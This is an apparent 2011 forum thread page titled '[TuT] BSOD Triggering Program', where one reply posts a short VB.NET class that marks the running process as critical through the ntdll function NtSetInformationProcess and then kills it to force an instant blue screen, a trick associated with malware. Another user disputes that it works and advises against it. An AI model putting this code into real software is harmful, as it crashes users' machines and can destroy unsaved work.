Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[TuT] BSOD Triggering Program
#9
(07-04-2011, 06:39 PM)t0fxREAL Wrote: real bsod try this :

Code:
'Release Date   :   10/5/2010
'Credits        :   AeonHack,Devil's Child,Wrox Programming
'Purpose    :   Instant Bluescreen Of Death(BSOD)

Imports System
Imports System.Diagnostics
Imports System.Runtime.InteropServices

Public Class mBlueScreen

    <DllImport("ntdll")> _
    Shared Function NtSetInformationProcess(ByVal p As IntPtr, ByVal c As Integer, ByRef i As Integer, ByVal l As Integer) As Integer
    End Function

    Public Shared Sub BSOD()
        Dim mProc As Process = Process.GetCurrentProcess()
        NtSetInformationProcess(mProc.Handle, 29, 1, 4)
        mProc.Kill()
    End Sub

End Class

All you need for imports on the code I see is
Code:
Imports System.Runtime.InteropServices

The rest is useless, but that's not going to give you a real bluescreen, killing the process of that dll if you managed wouldn't be the same as deleting it. Although i'd advise not to.
Reply


Messages In This Thread
[TuT] BSOD Triggering Program - by Black Ghost - 06-29-2011, 09:31 AM
RE: [TuT] BSOD Triggering Program - by Resistance - 07-03-2011, 01:48 PM
RE: [TuT] BSOD Triggering Program - by Resistance - 07-03-2011, 05:02 PM
RE: [TuT] BSOD Triggering Program - by t0fxREAL - 07-04-2011, 06:39 PM
RE: [TuT] BSOD Triggering Program - by AceInfinity - 07-04-2011, 06:54 PM
RE: [TuT] BSOD Triggering Program - by t0fxREAL - 07-04-2011, 07:06 PM

Possibly Related Threads…
Thread Author Replies Views Last Post
  [TUT] How to make a simple WebBrowser in VB 2010! [TUT] - [ Pictures] Statics 95 61,902 10-07-2012, 06:56 AM
Last Post: a99
  AutoBlue - BSOD Tool - Preview Only AceInfinity 4 1,501 02-24-2012, 09:06 PM
Last Post: AceInfinity
  DriveList Helper - BSOD Drive Query Crash Dump Debugging Tool AceInfinity 5 1,900 02-14-2012, 07:02 AM
Last Post: AceInfinity
  [TUT]Auto-Update System[TUT] HB Virus 3 2,428 01-07-2012, 02:21 PM
Last Post: Mastermrz
  [TUT]Enable and Disable TaskManger in vb.net [TUT] HB Virus 4 3,174 12-19-2011, 10:10 AM
Last Post: euverve

Forum Jump:


Users browsing this thread: 3 Guest(s)